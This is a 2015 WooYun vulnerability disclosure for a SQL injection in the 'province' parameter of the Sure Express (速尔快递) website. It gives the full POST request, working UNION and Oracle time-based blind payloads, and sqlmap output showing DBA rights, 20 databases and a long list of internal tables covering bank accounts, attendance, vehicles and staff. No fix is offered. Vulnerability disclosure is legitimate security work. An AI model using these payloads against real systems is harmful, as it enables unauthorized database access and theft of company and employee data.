当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141436

漏洞标题:快递行业之速尔快递官网SQL泄漏银行帐号/考勤/考核/车辆/网点等信息

相关厂商:速尔快递

漏洞作者: 洞主

提交时间:2015-09-16 10:45

修复时间:2015-10-31 10:46

公开时间:2015-10-31 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

库里的内容还是比较多的,具体有多少还是看漏洞证明吧,懒得打字。

详细说明:

注入点: http://www.sure56.com/bindselect.asp?
参数province 未做过滤,存在SQL注入。

POST /bindselect.asp HTTP/1.1
Origin: http://www.sure56.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.sure56.com/joinonline.asp
Accept: */*
Cookie: ASPSESSIONIDQACRBABR=MMEDOGBAJCLCDMOAOHMGFOFK; billcode=94102
Content-Length: 40
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en,*
Host: www.sure56.com
Pragma: no-cache
Cache-Control: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
action=fillArea&province=姹熻嫃鐪?city=

漏洞证明:

当前用户、DBA权限证明

Parameter: province (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: action=fillArea&province=江苏??city=' UNION ALL SELECT NULL,NULL,CH
R(113)||CHR(118)||CHR(113)||CHR(106)||CHR(113)||CHR(110)||CHR(85)||CHR(103)||CHR
(65)||CHR(104)||CHR(85)||CHR(80)||CHR(115)||CHR(87)||CHR(85)||CHR(113)||CHR(118)
||CHR(106)||CHR(106)||CHR(113) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: action=fillArea&province=江苏??city=' AND 8295=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(106)||CHR(110)||CHR(86)||CHR(71),5)--
---
[23:51:09] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[23:51:09] [INFO] fetching current user
current user:    'E3NEW'
[23:51:09] [INFO] testing if current user is DBA
current user is DBA:    True


存在的库

available databases [20]:
[*] APPQOSSYS
[*] ATHENA
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] E3DATA
[*] E3NEW
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRANSFER_USER
[*] WMSYS
[*] XDB


库E3NEW中的表,比较多,摘取一部分,

| TAB_网点班次表                         |
| TAB_网点运单库存余额表                         |
| TAB_网点采购表                         |
| TAB_网点银行账号表                         |
| TAB_网点预付款类型表                         |
| TAB_网络表                         |
| TAB_罚款表                         |
| TAB_罚款表单号                         |
| TAB_考勤日期表                         |
| TAB_考勤时效表                         |
| TAB_考勤机器连接配置表                         |
| TAB_考勤记录表                         |
| TAB_考核信息表                         |
| TAB_职位调动表                         |
| TAB_自定义联系人表                         |
| TAB_航班信息表                         |
| TAB_航空主单表                         |
| TAB_营业网点LOG表                      |
| TAB_营业网点操作类型表                         |
| TAB_营业网点表                         |
| TAB_袋运单子单表                         |
| TAB_解析错误记录表                         |
| TAB_订单来源表                         |
| TAB_订单状态对照表                         |
| TAB_评价类型维护表                         |
| TAB_财付通批量代付表                         |
| TAB_货单状态表                         |
| TAB_货币币别表                         |
| TAB_货款表                         |
| TAB_货款表_NEW                     |
| TAB_货款表_TEMP                    |
| TAB_费用确认类型表                         |
| TAB_费用确认表                         |
| TAB_车主司机信息表                         |
| TAB_车主司机维护日志表                         |
| TAB_车线利润分析统计表                         |
| TAB_车线利润成本表                         |
| TAB_车线利润成本表_中心                        |
| TAB_车线费用明细表                         |
| TAB_车辆OP记录表                       |
| TAB_车辆信息表                         |
| TAB_车辆实际运行监控表                         |
| TAB_车辆封签记录表                         |
| TAB_车辆班次表                         |
| TAB_车辆类型表                         |
| TAB_车辆线路时效表                         |
| TAB_车辆考勤记录表                         |
| TAB_车辆节点车线表                         |
| TAB_车辆表                         |
| TAB_车辆装载明细表                         |
| TAB_车辆费用表                         |
| TAB_车辆路由表                         |
| TAB_车辆车线中间表                         |
| TAB_车辆运行计划表                         |
| TAB_车队表                         |
| TAB_运单入库品名表                         |
| TAB_运单入库品名表_NEW                     |
| TAB_运单入库品名表_NEWAUDIT                |
| TAB_运单库存余额表                         |
| TAB_运单库存余额表_NEW                     |
| TAB_运单状态表                         |
| TAB_运单资料表                         |
| TAB_运单资料表_刷重量                        |
| TAB_运输车辆表                         |
| TAB_返回货单表                         |
| TAB_退网停网记录                         |
| TAB_通用报价修改序号                         |
| TAB_通用报价删除记录表                         |
| TAB_通用报价整车表                         |
| TAB_通用报价更新记录表                         |
| TAB_通用报价表                         |
| TAB_通用报价表BLOB_BAK                 |
| TAB_通用报价表CLOB                     |
| TAB_通用报价表CLOBAUDIT                |
| TAB_通用报价表CLOB_BAK20150826         |
| TAB_通用报价表承包区                         |
| TAB_通用报价表站点                         |
| TAB_通话记录管理                         |
| TAB_速付通财务确认表                         |
| TAB_速付通费用确认表                         |
| TAB_采购表                         |
| TAB_采购表_NEW                     |
| TAB_银行开户地区表                         |
| TAB_错分发件表                         |
| TAB_问题件原因表                         |
| TAB_问题件处理建议表                         |
| TAB_问题件处理表                         |
| TAB_问题件申报表                         |
| TAB_问题件类型                         |
| TAB_问题件类型NEW                      |
| TAB_问题件记录表                         |
| TAB_预付款付款方式表                         |
| TAB_预付款余额处理日志表                         |
| TAB_预付款余额待处理表                         |
| TAB_预付款帐套中心表                         |
| TAB_预付款类型表                         |
| TAB_预付款调度日志表                         |
| TAB_预付款转账表                         |
| 代收款手续费                       |
| 代收款比率                        |
| 代收货款手续费对帐比率表                 |
| 公司员工表                        |
| 删除记录表                        |
| 到付款中心对帐比率                    |
| 到付款比率                        |
| 到付款限制规则                      |
| 到付运单资料表                      |
| 区域对照管理表                      |
| 区域表网点调整反馈表                   |
| 巴枪记录表                        |
| 巴枪记录表_OPLOG_DEBUG                 |
| 承包区报价表                       |
| 报价权限表                        |
| 报价模板表                        |
| 报价表                          |
| 报关资料表                        |
| 本地自动对帐表                      |
| 管道自动对帐表                      |
| 系统参数表                        |
| 菜单表                          |
| 费用调整登记表                      |
| 车线路由表                        |
| 车辆皮重表                        |
| 车辆表                          |
| 运力表                          |
| AA_BIND                      |
| AA_E3NEW                     |
| AA_E3WEB                     |
| AA_GPRS                      |
| AA_HARD                      |


修复方案:

我也不知道

版权声明:转载请注明来源 洞主@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论